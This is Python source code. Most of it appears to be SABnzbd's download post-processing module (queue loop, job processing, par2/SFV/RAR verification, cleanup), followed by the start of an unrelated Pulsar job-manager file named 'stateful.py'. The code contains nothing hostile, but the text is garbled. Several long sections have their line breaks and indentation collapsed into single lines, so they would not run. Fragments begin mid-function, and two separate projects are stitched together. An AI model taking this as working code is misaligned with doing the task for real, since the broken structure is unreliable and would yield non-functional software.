            # best-effort: nzo may already be gone
            pass
        self.save()
        sabnzbd.history_updated()

    def stop(self):
        """ Stop thread after finishing running job """
        self.__stop = True
        # None acts as a sentinel to wake up both queue consumers
        self.slow_queue.put(None)
        self.fast_queue.put(None)

    def cancel_pp(self, nzo_id):
        """ Change the status, so that the PP is canceled """
        for nzo in self.history_queue:
            if nzo.nzo_id == nzo_id:
                nzo.abort_direct_unpacker()
                if nzo.pp_active:
                    nzo.pp_active = False
                return True
        return None

    def empty(self):
        """ Return True if pp queue is empty """
        return self.slow_queue.empty() and self.fast_queue.empty() and not self.__busy

    def get_queue(self):
        """ Return list of NZOs that still need to be processed """
        return [nzo for nzo in self.history_queue if nzo.work_name]

    def get_path(self, nzo_id):
        """ Return download path for given nzo_id or None when not found """
        for nzo in self.history_queue:
            if nzo.nzo_id == nzo_id:
                return nzo.downpath
        return None

    def run(self):
        """ Postprocessor loop """
        # First we do a dircheck
        complete_dir = sabnzbd.cfg.complete_dir.get_path()
        if sabnzbd.utils.checkdir.isFAT(complete_dir):
            logging.warning(T('Completed Download Folder %s is on FAT file system, limiting maximum file size to 4GB') % complete_dir)
        else:
            logging.info("Completed Download Folder %s is not on FAT", complete_dir)

        # Start looping
        check_eoq = False
        while not self.__stop:
            self.__busy = False

            if self.paused:
                time.sleep(5)
                continue

            # Something in the fast queue?
            try:
                # Every few fast-jobs we should check allow a
                # slow job so that they don't wait forever
                if self.__fast_job_count >= MAX_FAST_JOB_COUNT and self.slow_queue.qsize():
                    raise queue.Empty
                nzo = self.fast_queue.get(timeout=2)
                self.__fast_job_count += 1
            except queue.Empty:
                # Try the slow queue
                try:
                    nzo = self.slow_queue.get(timeout=2)
                    # Reset fast-counter
                    self.__fast_job_count = 0
                except queue.Empty:
                    # Check for empty queue
                    if check_eoq:
                        check_eoq = False
                        handle_empty_queue()
                    # No fast or slow jobs, better luck next loop!
                    continue

            # Stop job
            if not nzo:
                continue

            # Job was already deleted.
            if not nzo.work_name:
                check_eoq = True
                continue

            # Flag NZO as being processed
            nzo.pp_active = True

            # Pause downloader, if users wants that
            if cfg.pause_on_post_processing():
                sabnzbd.downloader.Downloader.do.wait_for_postproc()

            self.__busy = True

            process_job(nzo)

            if nzo.to_be_removed:
                history_db = database.HistoryDB()
                history_db.remove_history(nzo.nzo_id)
                history_db.close()
                nzo.purge_data()

            # Processing done
            nzo.pp_active = False

            self.remove(nzo)
            check_eoq = True

            # Allow download to proceed
            sabnzbd.downloader.Downloader.do.resume_from_postproc()


def process_job(nzo):
    """ Process one job """
    # NOTE(review): this function continues beyond this chunk of the file.
    start = time.time()

    # keep track of whether we can continue
    all_ok = True
    # keep track of par problems
    par_error = False
    # keep track of any unpacking errors
    unpack_error = False
    # Signal empty download, for when 'empty_postproc' is enabled
    empty = False
    nzb_list = []
    # These need to be initialized in case of a crash
    workdir_complete = ''
    script_log = ''
    script_line = ''

    # Get the job flags
    nzo.save_attribs()
    flag_repair, flag_unpack, flag_delete = nzo.repair_opts

    # Normalize PP
    if flag_delete:
        flag_unpack = True
    if flag_unpack:
        flag_repair = True

    # Get the NZB name
    filename = nzo.final_name

    if nzo.fail_msg:  # Special case: aborted due to too many missing data
        nzo.status = Status.FAILED
        nzo.save_attribs()
        all_ok = False
par_error = True unpack_error = 1 try: # Get the folder containing the download result workdir = nzo.downpath tmp_workdir_complete = None # if no files are present (except __admin__), fail the job if all_ok and len(globber(workdir)) < 2: if nzo.precheck: _enough, ratio = nzo.check_availability_ratio() req_ratio = float(cfg.req_completion_rate()) / 100.0 # Make sure that rounded ratio doesn't equal required ratio # when it is actually below required if (ratio < req_ratio) and (req_ratio - ratio) < 0.001: ratio = req_ratio - 0.001 emsg = '%.1f%%' % (ratio * 100.0) emsg2 = '%.1f%%' % float(cfg.req_completion_rate()) emsg = T('Download might fail, only %s of required %s available') % (emsg, emsg2) else: emsg = T('Download failed - Not on your server(s)') empty = True emsg += ' - https://sabnzbd.org/not-complete' nzo.fail_msg = emsg nzo.set_unpack_info('Fail', emsg) nzo.status = Status.FAILED # do not run unpacking or parity verification flag_repair = flag_unpack = False all_ok = cfg.empty_postproc() and empty if not all_ok: par_error = True unpack_error = 1 script = nzo.script logging.info('Starting Post-Processing on %s' + ' => Repair:%s, Unpack:%s, Delete:%s, Script:%s, Cat:%s', filename, flag_repair, flag_unpack, flag_delete, script, nzo.cat) # Set complete dir to workdir in case we need to abort workdir_complete = workdir # Par processing, if enabled if all_ok and flag_repair: par_error, re_add = parring(nzo, workdir) if re_add: # Try to get more par files return False # If we don't need extra par2, we can disconnect if sabnzbd.nzbqueue.NzbQueue.do.actives(grabs=False) == 0 and cfg.autodisconnect(): # This was the last job, close server connections sabnzbd.downloader.Downloader.do.disconnect() # Sanitize the resulting files if sabnzbd.WIN32: sanitize_files_in_folder(workdir) # Check if user allows unsafe post-processing if flag_repair and cfg.safe_postproc(): all_ok = all_ok and not par_error if all_ok: # Fix encodings fix_unix_encoding(workdir) # Use dirs 
generated by direct-unpacker if nzo.direct_unpacker and nzo.direct_unpacker.unpack_dir_info: tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file = nzo.direct_unpacker.unpack_dir_info else: # Generate extraction path tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file = prepare_extraction_path(nzo) newfiles = [] # Run Stage 2: Unpack if flag_unpack: # Set the current nzo status to "Extracting...". Used in History nzo.status = Status.EXTRACTING logging.info("Running unpack_magic on %s", filename) unpack_error, newfiles = unpack_magic(nzo, workdir, tmp_workdir_complete, flag_delete, one_folder, (), (), (), (), ()) logging.info("Unpacked files %s", newfiles) if sabnzbd.WIN32: # Sanitize the resulting files newfiles = sanitize_files_in_folder(tmp_workdir_complete) logging.info("Finished unpack_magic on %s", filename) if cfg.safe_postproc(): all_ok = all_ok and not unpack_error if all_ok: # Move any (left-over) files to destination nzo.status = Status.MOVING nzo.set_action_line(T('Moving'), '...') for root, _dirs, files in os.walk(workdir): if not root.endswith(JOB_ADMIN): for file_ in files: path = os.path.join(root, file_) new_path = path.replace(workdir, tmp_workdir_complete) ok, new_path = move_to_path(path, new_path) if new_path: newfiles.append(new_path) if not ok: nzo.set_unpack_info('Unpack', T('Failed moving %s to %s') % (path, new_path)) all_ok = False break # Set permissions right set_permissions(tmp_workdir_complete) if all_ok and marker_file: del_marker(os.path.join(tmp_workdir_complete, marker_file)) remove_from_list(marker_file, newfiles) if all_ok: # Remove files matching the cleanup list cleanup_list(tmp_workdir_complete, True) # Check if this is an NZB-only download, if so redirect to queue # except when PP was Download-only if flag_repair: nzb_list = nzb_redirect(tmp_workdir_complete, nzo.final_name, nzo.pp, script, nzo.cat, priority=nzo.priority) else: nzb_list = None if nzb_list: 
nzo.set_unpack_info('Download', T('Sent %s to queue') % nzb_list) cleanup_empty_directories(tmp_workdir_complete) else: cleanup_list(tmp_workdir_complete, False) script_output = '' script_ret = 0 if not nzb_list: # Give destination its final name if cfg.folder_rename() and tmp_workdir_complete and not one_folder: if all_ok: try: newfiles = rename_and_collapse_folder(tmp_workdir_complete, workdir_complete, newfiles) except: logging.error(T('Error renaming "%s" to "%s"'), clip_path(tmp_workdir_complete), clip_path(workdir_complete)) logging.info('Traceback: ', exc_info=True) # Better disable sorting because filenames are all off now file_sorter.sort_file = None else: workdir_complete = tmp_workdir_complete.replace('_UNPACK_', '_FAILED_') workdir_complete = get_unique_path(workdir_complete, n=0, create_dir=False) if empty: job_result = -1 else: job_result = int(par_error) + int(bool(unpack_error)) * 2 if cfg.ignore_samples(): remove_samples(workdir_complete) # TV/Movie/Date Renaming code part 2 - rename and move files to parent folder if all_ok and file_sorter.sort_file: if newfiles: file_sorter.rename(newfiles, workdir_complete) workdir_complete, ok = file_sorter.move(workdir_complete) else: workdir_complete, ok = file_sorter.rename_with_ext(workdir_complete) if not ok: nzo.set_unpack_info('Unpack', T('Failed to move files')) all_ok = False # Run the user script script_path = make_script_path(script) if (all_ok or not cfg.safe_postproc()) and (not nzb_list) and script_path: # Set the current nzo status to "Ext Script...". 
Used in History nzo.status = Status.RUNNING nzo.set_action_line(T('Running script'), script) nzo.set_unpack_info('Script', T('Running user script %s') % script, unique=True) script_log, script_ret = external_processing(script_path, nzo, clip_path(workdir_complete), nzo.final_name, job_result) script_line = get_last_line(script_log) if script_log: script_output = nzo.nzo_id if script_line: nzo.set_unpack_info('Script', script_line, unique=True) else: nzo.set_unpack_info('Script', T('Ran %s') % script, unique=True) else: script = "" script_line = "" script_ret = 0 # Maybe bad script result should fail job if script_ret and cfg.script_can_fail(): script_error = True all_ok = False nzo.fail_msg = T('Script exit code is %s') % script_ret else: script_error = False # Email the results if (not nzb_list) and cfg.email_endjob(): if (cfg.email_endjob() == 1) or (cfg.email_endjob() == 2 and (unpack_error or par_error or script_error)): emailer.endjob(nzo.final_name, nzo.cat, all_ok, workdir_complete, nzo.bytes_downloaded, nzo.fail_msg, nzo.unpack_info, script, script_log, script_ret) if script_output: # Can do this only now, otherwise it would show up in the email if script_ret: script_ret = 'Exit(%s) ' % script_ret else: script_ret = '' if len(script_log.rstrip().split('\n')) > 1: nzo.set_unpack_info('Script', '%s%s <a href="./scriptlog?name=%s">(%s)</a>' % (script_ret, script_line, xml.sax.saxutils.escape(script_output), T('More')), unique=True) else: # No '(more)' button needed nzo.set_unpack_info('Script', '%s%s ' % (script_ret, script_line), unique=True) # Cleanup again, including NZB files if all_ok: cleanup_list(workdir_complete, False) # Force error for empty result all_ok = all_ok and not empty # Update indexer with results if cfg.rating_enable(): if nzo.encrypted > 0: Rating.do.update_auto_flag(nzo.nzo_id, Rating.FLAG_ENCRYPTED) if empty: hosts = [s.host for s in sabnzbd.downloader.Downloader.do.nzo_servers(nzo)] if not hosts: hosts = [None] for host in hosts: 
Rating.do.update_auto_flag(nzo.nzo_id, Rating.FLAG_EXPIRED, host) except: logging.error(T('Post Processing Failed for %s (%s)'), filename, T('see logfile')) logging.info("Traceback: ", exc_info=True) nzo.fail_msg = T('PostProcessing was aborted (%s)') % T('see logfile') notifier.send_notification(T('Download Failed'), filename, 'failed', nzo.cat) nzo.status = Status.FAILED par_error = True all_ok = False if cfg.email_endjob(): emailer.endjob(nzo.final_name, nzo.cat, all_ok, clip_path(workdir_complete), nzo.bytes_downloaded, nzo.fail_msg, nzo.unpack_info, '', '', 0) if all_ok: # If the folder only contains one file OR folder, have that as the path # Be aware that series/generic/date sorting may move a single file into a folder containing other files workdir_complete = one_file_or_folder(workdir_complete) workdir_complete = os.path.normpath(workdir_complete) # Clean up the NZO data try: nzo.purge_data(delete_all_data=all_ok) except: logging.error(T('Cleanup of %s failed.'), nzo.final_name) logging.info("Traceback: ", exc_info=True) # Use automatic retry link on par2 errors and encrypted/bad RARs if par_error or unpack_error in (2, 3): try_alt_nzb(nzo) # Show final status in history if all_ok: notifier.send_notification(T('Download Completed'), filename, 'complete', nzo.cat) nzo.status = Status.COMPLETED else: notifier.send_notification(T('Download Failed'), filename, 'failed', nzo.cat) nzo.status = Status.FAILED # Log the overall time taken for postprocessing postproc_time = int(time.time() - start) # Create the history DB instance history_db = database.HistoryDB() # Add the nzo to the database. 
def prepare_extraction_path(nzo):
    """ Based on the information that we have, generate
        the extraction path and create the directory.
        Separated so it can be called from DirectUnpacker

        Returns a tuple (tmp_workdir_complete, workdir_complete,
        file_sorter, one_folder, marker_file).
        Raises IOError when the final folder cannot be created.
    """
    one_folder = False
    marker_file = None

    # Determine class directory; a trailing '*' on the category dir means
    # "unpack directly into the category folder" (no per-job folder)
    catdir = config.get_categories(nzo.cat).dir()
    if catdir.endswith('*'):
        catdir = catdir.strip('*')
        one_folder = True
    complete_dir = real_path(cfg.complete_dir.get_path(), catdir)
    complete_dir = long_path(complete_dir)

    # TV/Movie/Date Renaming code part 1 - detect and construct paths
    if cfg.enable_meta():
        file_sorter = Sorter(nzo, nzo.cat)
    else:
        file_sorter = Sorter(None, nzo.cat)
    complete_dir = file_sorter.detect(nzo.final_name, complete_dir)
    if file_sorter.sort_file:
        # Sorting implies a dedicated job folder
        one_folder = False

    complete_dir = sanitize_and_trim_path(complete_dir)

    if one_folder:
        workdir_complete = create_all_dirs(complete_dir, umask=True)
    else:
        workdir_complete = get_unique_path(os.path.join(complete_dir, nzo.final_name), create_dir=True)
        marker_file = set_marker(workdir_complete)

    if not workdir_complete or not os.path.exists(workdir_complete):
        logging.error(T('Cannot create final folder %s') % os.path.join(complete_dir, nzo.final_name))
        raise IOError

    if cfg.folder_rename() and not one_folder:
        prefixed_path = prefix(workdir_complete, '_UNPACK_')
        # Reuse prefixed_path instead of recomputing prefix() a second time
        tmp_workdir_complete = get_unique_path(prefixed_path, create_dir=False)
        try:
            renamer(workdir_complete, tmp_workdir_complete)
        except:
            pass  # On failure, just use the original name

        # Is the unique path different? Then we also need to modify the final path
        if prefixed_path != tmp_workdir_complete:
            workdir_complete = workdir_complete + os.path.splitext(tmp_workdir_complete)[1]
    else:
        tmp_workdir_complete = workdir_complete

    return tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file
logging.info("No par2 sets for %s", filename) nzo.set_unpack_info('Repair', T('[%s] No par2 sets') % filename) if cfg.sfv_check() and not verified.get('', False): par_error = not try_sfv_check(nzo, workdir) verified[''] = not par_error # If still no success, do RAR-check or RAR-rename if not par_error and cfg.enable_unrar(): _, _, rars, _, _ = build_filelists(workdir) # If there's no RAR's, they might be super-obfuscated if not rars: # Returns number of renamed RAR's if rar_renamer(nzo, workdir): # Re-parse the files so we can do RAR-check _, _, rars, _, _ = build_filelists(workdir) if rars: par_error = not try_rar_check(nzo, rars) verified[''] = not par_error if re_add: logging.info('Re-added %s to queue', filename) if nzo.priority != TOP_PRIORITY: nzo.priority = REPAIR_PRIORITY nzo.status = Status.FETCHING sabnzbd.nzbqueue.NzbQueue.do.add(nzo) sabnzbd.downloader.Downloader.do.resume_from_postproc() sabnzbd.save_data(verified, VERIFIED_FILE, nzo.workpath) logging.info('Verification and repair finished for %s', filename) return par_error, re_add def try_sfv_check(nzo, workdir): """ Attempt to verify set using SFV file Return True if verified, False when failed """ # Get list of SFV names; shortest name first, minimizes the chance on a mismatch sfvs = globber_full(workdir, '*.sfv') sfvs.sort(key=lambda x: len(x)) par_error = False found = False for sfv in sfvs: found = True setname = setname_from_path(sfv) nzo.status = Status.VERIFYING nzo.set_unpack_info('Repair', T('Trying SFV verification'), setname) nzo.set_action_line(T('Trying SFV verification'), '...') failed = sfv_check(sfv) if failed: fail_msg = T('Some files failed to verify against "%s"') % setname msg = fail_msg + '; ' msg += '; '.join(failed) nzo.set_unpack_info('Repair', msg, setname) par_error = True else: nzo.set_unpack_info('Repair', T('Verified successfully using SFV files'), setname) # Show error in GUI if found and par_error: nzo.status = Status.FAILED nzo.fail_msg = fail_msg return False # 
Success or just no SFV's return True def try_rar_check(nzo, rars): """ Attempt to verify set using the RARs Return True if verified, False when failed When setname is '', all RAR files will be used, otherwise only the matching one If no RAR's are found, returns True """ # Sort for better processing rars.sort(key=functools.cmp_to_key(rar_sort)) # Test if rars: setname = setname_from_path(rars[0]) nzo.status = Status.VERIFYING nzo.set_unpack_info('Repair', T('Trying RAR-based verification'), setname) nzo.set_action_line(T('Trying RAR-based verification'), '...') try: # Set path to unrar and open the file # Requires de-unicode for RarFile to work! rarfile.UNRAR_TOOL = sabnzbd.newsunpack.RAR_COMMAND zf = rarfile.RarFile(rars[0]) # Skip if it's encrypted if zf.needs_password(): msg = T('[%s] RAR-based verification failed: %s') % (setname, T('Passworded')) nzo.set_unpack_info('Repair', msg) return True # Will throw exception if something is wrong zf.testrar() # Success! msg = T('RAR files verified successfully') nzo.set_unpack_info('Repair', msg, setname) logging.info(msg) return True except rarfile.Error as e: nzo.fail_msg = T('RAR files failed to verify') msg = T('[%s] RAR-based verification failed: %s') % (setname, e) nzo.set_unpack_info('Repair', msg, setname) logging.info(msg) return False else: # No rar-files, so just continue return True def rar_renamer(nzo, workdir): """ Try to use the the header information to give RAR-files decent names """ nzo.status = Status.VERIFYING nzo.set_unpack_info('Repair', T('Trying RAR-based verification')) nzo.set_action_line(T('Trying RAR-based verification'), '...') renamed_files = 0 workdir_files = recursive_listdir(workdir) for file_to_check in workdir_files: # The function will check if it's a RAR-file # We do a sanity-check for the returned number rar_vol, new_extension = rarvolinfo.get_rar_extension(file_to_check) if 0 < rar_vol < 1000: logging.debug("Detected volume-number %s from RAR-header: %s ", rar_vol, file_to_check) 
def handle_empty_queue():
    """ Check if empty queue calls for action """
    if sabnzbd.nzbqueue.NzbQueue.do.actives() != 0:
        return
    sabnzbd.save_state()
    notifier.send_notification("SABnzbd", T('Queue finished'), 'queue_done')

    # Perform end-of-queue action when one is set
    if not sabnzbd.QUEUECOMPLETEACTION:
        return
    logging.info("Queue has finished, launching: %s (%s)",
                 sabnzbd.QUEUECOMPLETEACTION, sabnzbd.QUEUECOMPLETEARG)
    if sabnzbd.QUEUECOMPLETEARG:
        sabnzbd.QUEUECOMPLETEACTION(sabnzbd.QUEUECOMPLETEARG)
    else:
        Thread(target=sabnzbd.QUEUECOMPLETEACTION).start()
    sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False)


def cleanup_list(wdir, skip_nzb):
    """ Remove all files whose extension matches the cleanup list,
        optionally ignoring the nzb extension """
    if not cfg.cleanup_list():
        return
    try:
        entries = os.listdir(wdir)
    except:
        entries = ()
    for entry in entries:
        full_path = os.path.join(wdir, entry)
        if os.path.isdir(full_path):
            # Recurse into sub-directories first
            cleanup_list(full_path, skip_nzb)
            continue
        if not on_cleanup_list(entry, skip_nzb):
            continue
        try:
            logging.info("Removing unwanted file %s", full_path)
            remove_file(full_path)
        except:
            logging.error(T('Removing %s failed'), clip_path(full_path))
            logging.info("Traceback: ", exc_info=True)
    if entries:
        # Best effort: succeeds only when the folder ended up empty
        try:
            remove_dir(wdir)
        except:
            pass


def prefix(path, pre):
    """ Apply prefix to last part of path
        '/my/path' and 'hi_' will give '/my/hi_path'
    """
    head, tail = os.path.split(path)
    return os.path.join(head, pre + tail)
def one_file_or_folder(folder):
    """ If the dir only contains one file or folder, join that file/folder onto the path """
    if os.path.exists(folder) and os.path.isdir(folder):
        try:
            cont = os.listdir(folder)
            if len(cont) == 1:
                folder = os.path.join(folder, cont[0])
                folder = one_file_or_folder(folder)
        except OSError:
            # Can occur on paths Windows doesn't like, for example "C:".
            # Fix: the original caught WindowsError, which is undefined on
            # non-Windows Python 3 and would raise NameError there; on
            # Windows, WindowsError is an alias of OSError, so behavior
            # is preserved.
            pass
    return folder


# Basic pattern to strip HTML tags from script output
TAG_RE = re.compile(r'<[^>]+>')


def get_last_line(txt):
    """ Return last non-empty line of a text, trim to 150 max """
    # First we remove HTML code in a basic way
    txt = TAG_RE.sub(' ', txt)

    # Then we get the last line
    lines = txt.split('\n')
    n = len(lines) - 1
    while n >= 0 and not lines[n].strip('\r\t '):
        n = n - 1

    line = lines[n].strip('\r\t ')
    if len(line) >= 150:
        line = line[:147] + '...'
    return line


def remove_samples(path):
    """ Remove all files that match the sample pattern
        Skip deleting if it matches all files or there is only 1 file
    """
    files_to_delete = []
    nr_files = 0
    for root, _dirs, files in os.walk(path):
        for file_to_match in files:
            nr_files += 1
            if RE_SAMPLE.search(file_to_match):
                files_to_delete.append(os.path.join(root, file_to_match))

    # Make sure we skip false-positives
    if len(files_to_delete) < nr_files:
        # Renamed loop variable: it previously shadowed the 'path' parameter
        for file_path in files_to_delete:
            try:
                logging.info("Removing unwanted sample file %s", file_path)
                remove_file(file_path)
            except:
                logging.error(T('Removing %s failed'), clip_path(file_path))
                logging.info("Traceback: ", exc_info=True)
    else:
        logging.info("Skipping sample-removal, false-positive")


def rename_and_collapse_folder(oldpath, newpath, files):
    """ Rename folder, collapsing when there's just a single subfolder
        oldpath --> newpath OR oldpath/subfolder --> newpath
        Modify list of filenames accordingly and return it
    """
    orgpath = oldpath
    items = globber(oldpath)
    if len(items) == 1:
        folder = items[0]
        folder_path = os.path.join(oldpath, folder)
        # Never collapse DVD structure folders
        if os.path.isdir(folder_path) and folder not in ('VIDEO_TS', 'AUDIO_TS'):
            logging.info('Collapsing %s', os.path.join(newpath, folder))
            oldpath = folder_path

    oldpath = os.path.normpath(oldpath)
    newpath = os.path.normpath(newpath)
    files = [os.path.normpath(f).replace(oldpath, newpath) for f in files]

    renamer(oldpath, newpath)
    try:
        # Remove the now-empty original top folder (best effort)
        remove_dir(orgpath)
    except:
        pass
    return files


def set_marker(folder):
    """ Set marker file and return name, or None when it could not be created """
    name = cfg.marker_file()
    if name:
        path = os.path.join(folder, name)
        logging.debug('Create marker file %s', path)
        try:
            # Context manager guarantees the handle is closed even on error
            with open(path, 'w'):
                pass
        except:
            logging.info('Cannot create marker file %s', path)
            logging.info("Traceback: ", exc_info=True)
            name = None
    return name
logging.info("Traceback: ", exc_info=True) def remove_from_list(name, lst): if name: for n in range(len(lst)): if lst[n].endswith(name): logging.debug('Popping %s', lst[n]) lst.pop(n) return def try_alt_nzb(nzo): """ Try to get a new NZB if available """ url = nzo.nzo_info.get('failure') if url and cfg.new_nzb_on_failure(): sabnzbd.add_url(url, nzo.pp, nzo.script, nzo.cat, nzo.priority)
stateful.py
from __future__ import division

import contextlib
import datetime
import os
import time
import threading

from galaxy.tools.deps import dependencies
from pulsar.client.util import filter_destination_params
from pulsar.managers import ManagerProxy
from pulsar.managers import status
from pulsar.managers.util.retry import RetryActionExecutor
from .staging import preprocess
from .staging import postprocess

import logging
log = logging.getLogger(__name__)

DEFAULT_DO_MONITOR = False

DECACTIVATE_FAILED_MESSAGE = "Failed to deactivate job with job id %s. May cause problems on next Pulsar start."
ACTIVATE_FAILED_MESSAGE = "Failed to activate job with job id %s. This job may not recover properly upon Pulsar restart."

# Per-job metadata keys used to persist lifecycle progress across restarts.
JOB_FILE_FINAL_STATUS = "final_status"
JOB_FILE_POSTPROCESSED = "postprocessed"
JOB_FILE_PREPROCESSED = "preprocessed"
JOB_FILE_PREPROCESSING_FAILED = "preprocessing_failed"
JOB_METADATA_RUNNING = "running"

# Two pools of "active" jobs: still staging inputs vs. handed to the manager.
ACTIVE_STATUS_PREPROCESSING = "preprocessing"
ACTIVE_STATUS_LAUNCHED = "launched"

# Minimum delay (seconds) between monitor polling iterations.
DEFAULT_MIN_POLLING_INTERVAL = 0.5


class StatefulManagerProxy(ManagerProxy):
    """Proxy a Pulsar manager, adding persistent job-state tracking.

    Wraps the proxied manager's operations with pre-/post-processing
    (remote staging) steps and records per-job lifecycle metadata so that
    active jobs can be recovered after a Pulsar restart.
    """

    def __init__(self, manager, **manager_options):
        super(StatefulManagerProxy, self).__init__(manager)
        min_polling_interval = float(manager_options.get("min_polling_interval", DEFAULT_MIN_POLLING_INTERVAL))
        # Destination-configurable retry behavior for staging actions.
        preprocess_retry_action_kwds = filter_destination_params(manager_options, "preprocess_action_")
        postprocess_retry_action_kwds = filter_destination_params(manager_options, "postprocess_action_")
        self.__preprocess_action_executor = RetryActionExecutor(**preprocess_retry_action_kwds)
        self.__postprocess_action_executor = RetryActionExecutor(**postprocess_retry_action_kwds)
        self.min_polling_interval = datetime.timedelta(0, min_polling_interval)
        self.active_jobs = ActiveJobs.from_manager(manager)
        # Placeholder callback until the app installs a real one.
        self.__state_change_callback = self._default_status_change_callback
        self.__monitor = None

    def set_state_change_callback(self, state_change_callback):
        # Installing the callback also starts the background job monitor.
        self.__state_change_callback = state_change_callback
        self.__monitor = ManagerMonitor(self)
    def _default_status_change_callback(self, status, job_id):
        # Used until set_state_change_callback() installs a real callback.
        log.info("Status of job [%s] changed to [%s]. No callbacks enabled." % (job_id, status))

    @property
    def name(self):
        """Name of the underlying (proxied) manager."""
        return self._proxied_manager.name

    def setup_job(self, *args, **kwargs):
        """Delegate job directory setup to the proxied manager; return job id."""
        job_id = self._proxied_manager.setup_job(*args, **kwargs)
        return job_id

    def _persist_launch_config(self, job_id, launch_config):
        # Persist the launch configuration so the launch can be replayed
        # after a Pulsar restart (see recover_active_jobs).
        job_directory = self._proxied_manager.job_directory(job_id)
        job_directory.store_metadata("launch_config", launch_config)

    def touch_outputs(self, job_id, touch_outputs):
        """Create (or update) each named output file of the job."""
        job_directory = self._proxied_manager.job_directory(job_id)
        for name in touch_outputs:
            path = job_directory.calculate_path(name, 'output')
            # Opening in append mode creates the file without truncating it.
            job_directory.open_file(path, mode='a')

    def preprocess_and_launch(self, job_id, launch_config):
        """Launch the job, staging remote inputs first when required.

        When the launch config requests remote staging setup, the staging
        runs on a background thread before the actual launch.
        """
        self._persist_launch_config(job_id, launch_config)
        requires_preprocessing = launch_config.get("remote_staging") and launch_config["remote_staging"].get("setup")
        if requires_preprocessing:
            self.active_jobs.activate_job(job_id, active_status=ACTIVE_STATUS_PREPROCESSING)
            self._launch_prepreprocessing_thread(job_id, launch_config)
        else:
            # No staging needed - the context manager's exit path performs
            # the actual launch, hence the empty body.
            with self._handling_of_preprocessing_state(job_id, launch_config):
                pass

    def _launch_prepreprocessing_thread(self, job_id, launch_config):
        # Stage inputs on a background thread so callers are not blocked.
        def do_preprocess():
            with self._handling_of_preprocessing_state(job_id, launch_config):
                job_directory = self._proxied_manager.job_directory(job_id)
                staging_config = launch_config.get("remote_staging", {})
                # TODO: swap out for a generic "job_extra_params"
                if 'action_mapper' in staging_config and \
                        'ssh_key' in staging_config['action_mapper'] and \
                        'setup' in staging_config:
                    # Propagate the ssh_key to every setup action.
                    for action in staging_config['setup']:
                        action['action'].update(ssh_key=staging_config['action_mapper']['ssh_key'])
                preprocess(job_directory, staging_config.get("setup", []), self.__preprocess_action_executor)
                self.active_jobs.deactivate_job(job_id, active_status=ACTIVE_STATUS_PREPROCESSING)

        new_thread_for_job(self, "preprocess", job_id, do_preprocess, daemon=False)
    @contextlib.contextmanager
    def _handling_of_preprocessing_state(self, job_id, launch_config):
        # The with-block body performs any preprocessing; on normal exit
        # this launches the job and marks it preprocessed, on exception it
        # records the failure and notifies the state-change callback.
        job_directory = self._proxied_manager.job_directory(job_id)
        try:
            yield
            launch_kwds = {}
            if launch_config.get("dependencies_description"):
                dependencies_description = dependencies.DependenciesDescription.from_dict(launch_config["dependencies_description"])
                launch_kwds["dependencies_description"] = dependencies_description
            for kwd in ["submit_params", "setup_params", "env"]:
                if kwd in launch_config:
                    launch_kwds[kwd] = launch_config[kwd]
            self._proxied_manager.launch(
                job_id, launch_config["command_line"], **launch_kwds
            )
            with job_directory.lock("status"):
                job_directory.store_metadata(JOB_FILE_PREPROCESSED, True)
            self.active_jobs.activate_job(job_id)
        except Exception as e:
            with job_directory.lock("status"):
                job_directory.store_metadata(JOB_FILE_PREPROCESSING_FAILED, True)
                # Synthesize a failed-job result so clients see the error.
                job_directory.store_metadata("return_code", 1)
                job_directory.write_file("stderr", str(e))
            self.__state_change_callback(status.FAILED, job_id)
            log.exception("Failed job preprocessing for job %s:", job_id)

    def handle_failure_before_launch(self, job_id):
        # Job never reached the proxied manager - report failure to client.
        self.__state_change_callback(status.FAILED, job_id)

    def get_status(self, job_id):
        """ Compute status used proxied manager and handle state transitions
        and track additional state information needed.
        """
        job_directory = self._proxied_manager.job_directory(job_id)
        with job_directory.lock("status"):
            proxy_status, state_change = self.__proxy_status(job_directory, job_id)

        if state_change == "to_complete":
            self.__deactivate(job_id, proxy_status)
        elif state_change == "to_running":
            self.__state_change_callback(status.RUNNING, job_id)

        return self.__status(job_directory, proxy_status)

    def __proxy_status(self, job_directory, job_id):
        """ Determine state with proxied job manager and if this job needs
        to be marked as deactivated (this occurs when job first returns a
        complete status from proxy.
        """
        state_change = None
        if job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED):
            proxy_status = status.FAILED
            job_directory.store_metadata(JOB_FILE_FINAL_STATUS, proxy_status)
            state_change = "to_complete"
        elif not job_directory.has_metadata(JOB_FILE_PREPROCESSED):
            proxy_status = status.PREPROCESSING
        elif job_directory.has_metadata(JOB_FILE_FINAL_STATUS):
            # Final status already cached - avoid polling the manager again.
            proxy_status = job_directory.load_metadata(JOB_FILE_FINAL_STATUS)
        else:
            proxy_status = self._proxied_manager.get_status(job_id)
            if proxy_status == status.RUNNING:
                # First observation of RUNNING triggers the state change.
                if not job_directory.has_metadata(JOB_METADATA_RUNNING):
                    job_directory.store_metadata(JOB_METADATA_RUNNING, True)
                    state_change = "to_running"
            elif proxy_status in [status.COMPLETE, status.CANCELLED]:
                job_directory.store_metadata(JOB_FILE_FINAL_STATUS, proxy_status)
                state_change = "to_complete"
        return proxy_status, state_change

    def __status(self, job_directory, proxy_status):
        """ Use proxied manager's status to compute the real (stateful)
        status of job.
        """
        if proxy_status == status.COMPLETE:
            # Stay in POSTPROCESSING until output staging has finished.
            if not job_directory.has_metadata(JOB_FILE_POSTPROCESSED):
                job_status = status.POSTPROCESSING
            else:
                job_status = status.COMPLETE
        else:
            job_status = proxy_status
        return job_status

    def __deactivate(self, job_id, proxy_status):
        # Stop tracking this job and let the proxied manager clean up.
        self.active_jobs.deactivate_job(job_id)
        deactivate_method = getattr(self._proxied_manager, "_deactivate_job", None)
        if deactivate_method:
            try:
                deactivate_method(job_id)
            except Exception:
                log.exception("Failed to deactivate via proxied manager job %s" % job_id)

        if proxy_status == status.COMPLETE:
            self.__handle_postprocessing(job_id)

    def __handle_postprocessing(self, job_id):
        # Output staging runs on a background thread; the final status is
        # reported through the state-change callback when it finishes.
        def do_postprocess():
            postprocess_success = False
            job_directory = self._proxied_manager.job_directory(job_id)
            try:
                postprocess_success = postprocess(job_directory, self.__postprocess_action_executor)
            except Exception:
                log.exception("Failed to postprocess results for job id %s" % job_id)
            final_status = status.COMPLETE if postprocess_success else status.FAILED
